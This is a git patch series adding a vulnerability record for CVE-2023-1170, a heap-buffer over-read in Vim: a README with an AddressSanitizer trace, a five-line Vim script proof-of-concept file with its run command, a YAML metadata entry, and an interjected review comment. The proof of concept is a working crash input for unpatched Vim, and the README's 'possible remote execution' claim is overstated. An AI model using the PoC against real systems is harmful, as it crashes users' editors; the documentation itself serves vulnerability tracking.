From e76cdf0d4c8c1ccbc644f0172f256e1661781e44 Mon Sep 17 00:00:00 2001
From: s0uthwood
Date: Sun, 2 Apr 2023 13:22:47 +0800
Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-1170?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/vim/2023/CVE-2023-1170/README.md | 100 ++++++++++++++++++++++++
 cve/vim/2023/CVE-2023-1170/poc8_hbo.dat | 5 ++
 cve/vim/2023/yaml/CVE-2023-1170.yaml | 19 +++++
 3 files changed, 124 insertions(+)
 create mode 100644 cve/vim/2023/CVE-2023-1170/README.md
 create mode 100644 cve/vim/2023/CVE-2023-1170/poc8_hbo.dat
 create mode 100644 cve/vim/2023/yaml/CVE-2023-1170.yaml

diff --git a/cve/vim/2023/CVE-2023-1170/README.md b/cve/vim/2023/CVE-2023-1170/README.md
new file mode 100644
index 00000000..63eceebc
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1170/README.md
@@ -0,0 +1,100 @@ +## Description + +Heap-buffer-overflow in utf_ptr2char at mbyte.c:1825. + +## vim version + +```bash +git log +commit f0300fc7b81e63c2584dc3a763dedea4184d17e5 (grafted, HEAD -> master, tag: v9.0.1365, origin/master, origin/HEAD) +``` + +## Proof of Concept + +```bash +./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc8_hbo.dat -c :qa +================================================================= +==28015==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000008900 at pc 0x55bde0d0e239 bp 0x7fff1bc7f540 sp 0x7fff1bc7f530 +READ of size 1 at 0x621000008900 thread T0 + #0 0x55bde0d0e238 in utf_ptr2char /home/fuzz/vim/src/mbyte.c:1825 + #1 0x55bde0d410af in gchar_cursor /home/fuzz/vim/src/misc1.c:550 + #2 0x55bde0dbe950 in adjust_cursor_eol /home/fuzz/vim/src/ops.c:1873 + #3 0x55bde0ed97e7 in do_put /home/fuzz/vim/src/register.c:2301 + #4 0x55bde0db035d in nv_put_opt /home/fuzz/vim/src/normal.c:7378 + #5 0x55bde0daf772 in nv_put /home/fuzz/vim/src/normal.c:7255 + #6 0x55bde0d866e1 in normal_cmd /home/fuzz/vim/src/normal.c:939 + #7 0x55bde0bff4d3 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887 + #8 0x55bde0bff292 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850 + #9 0x55bde0bfeb36 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768 + #10 0x55bde0bdad87 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #11 0x55bde0bd1ef2 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #12 0x55bde0f01d65 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759 + #13 0x55bde0f02fe0 in do_source /home/fuzz/vim/src/scriptfile.c:1905 + #14 0x55bde0effa08 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250 + #15 0x55bde0effa6d in ex_source /home/fuzz/vim/src/scriptfile.c:1276 + #16 0x55bde0bdad87 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580 + #17 0x55bde0bd1ef2 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993 + #18 0x55bde0bd028c in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 + #19 0x55bde12037ab in exe_commands /home/fuzz/vim/src/main.c:3146 + #20 
0x55bde11fc8ea in vim_main2 /home/fuzz/vim/src/main.c:782 + #21 0x55bde11fc19c in main /home/fuzz/vim/src/main.c:433 + #22 0x7fcb6ae03082 in __libc_start_main ../csu/libc-start.c:308 + #23 0x55bde0a44e4d in _start (/home/fuzz/vim/src/vim+0x142e4d) + +0x621000008900 is located 0 bytes to the right of 4096-byte region [0x621000007900,0x621000008900) +allocated by thread T0 here: + #0 0x7fcb6b29a808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 + #1 0x55bde0a4528a in lalloc /home/fuzz/vim/src/alloc.c:246 + #2 0x55bde0a4507b in alloc /home/fuzz/vim/src/alloc.c:151 + #3 0x55bde1207c37 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:885 + #4 0x55bde1205f48 in mf_new /home/fuzz/vim/src/memfile.c:375 + #5 0x55bde0d2bba8 in ml_new_data /home/fuzz/vim/src/memline.c:4138 + #6 0x55bde0d19983 in ml_open /home/fuzz/vim/src/memline.c:391 + #7 0x55bde0a618ea in open_buffer /home/fuzz/vim/src/buffer.c:192 + #8 0x55bde1202add in create_windows /home/fuzz/vim/src/main.c:2915 + #9 0x55bde11fc6ac in vim_main2 /home/fuzz/vim/src/main.c:713 + #10 0x55bde11fc19c in main /home/fuzz/vim/src/main.c:433 + #11 0x7fcb6ae03082 in __libc_start_main ../csu/libc-start.c:308 + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/vim/src/mbyte.c:1825 in utf_ptr2char +Shadow bytes around the buggy address: + 0x0c427fff90d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff90e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff90f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fff9120:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff9130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff9140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff9150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff9160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 
0x0c427fff9170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==28015==ABORTING +``` + +poc: +[poc8_hbo.dat](poc8_hbo.dat) + +## Impact + +This vulnerability is capable of crashing software, modify memory, and possible remote execution. diff --git a/cve/vim/2023/CVE-2023-1170/poc8_hbo.dat b/cve/vim/2023/CVE-2023-1170/poc8_hbo.dat new file mode 100644 index 00000000..22443b29 --- /dev/null +++ b/cve/vim/2023/CVE-2023-1170/poc8_hbo.dat @@ -0,0 +1,5 @@ +norm0R V +sil0normc 0 +no0 v +se ve=all +sil0norm0z=p \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1170.yaml b/cve/vim/2023/yaml/CVE-2023-1170.yaml new file mode 100644 index 00000000..b8884618 --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-1170.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-1170 +source: https://huntr.dev/bounties/286e0090-e654-46d2-ac60-29f81799d0a4/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: medium + description: | + Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1376. + scope-of-influence: + vim < 9.0.1376 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-1170 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H + cvss-score: 6.6 + cve-id: CVE-2023-1170 + cwe-id: CWE-122 + cnvd-id: None + kve-id: None + tags: cve2023, 堆缓冲区溢出 -- Gitee From 55713c7d367c3319b5bfe323369c05586c9d9a65 Mon Sep 17 00:00:00 2001 
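Review bot: The `description` field of the new record only repeats the NVD one-liner, while the README added in the same commit pins down where the bug actually fires — a 1-byte read past the end of a 4096-byte memline block in `utf_ptr2char` (mbyte.c:1825), reached via `do_put` → `adjust_cursor_eol` → `gchar_cursor` when the PoC is sourced with `-S`; carrying that into the yaml (e.g. `description: | Heap-based buffer over-read in utf_ptr2char() (mbyte.c) reached through do_put()/adjust_cursor_eol() when sourcing a crafted script; fixed in vim 9.0.1376.`) makes the entry searchable by function and ties it to the PoC. The two files also disagree on impact: the yaml scores the issue `AV:L/AC:L/PR:N/UI:R` — a local user has to open or source an attacker-supplied script — whereas the README's Impact section claims "possible remote execution", which the ASan report (an out-of-bounds read of size 1) does not support, so the README (outside this hunk) should be toned down to match the vector rather than the record being left inconsistent with it. Finally, `reference` lists only the NVD entry; the upstream fixing patch (vim 9.0.1376, the same boundary `scope-of-influence` already names) should be referenced so a reader can verify that the PoC no longer reproduces on a patched build.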
From: s0uthwood
Date: Sun, 2 Apr 2023 13:29:01 +0800
Subject: [PATCH 2/2] Update openkylin_list.yaml

---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 2b5c3a4e..c8ccdbe5 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -120,6 +120,7 @@ cve: - CVE-2023-0288 - CVE-2023-0512 - CVE-2023-1127 + - CVE-2023-1170 - CVE-2023-1175 - CVE-2023-1264 openssl:
--
Gitee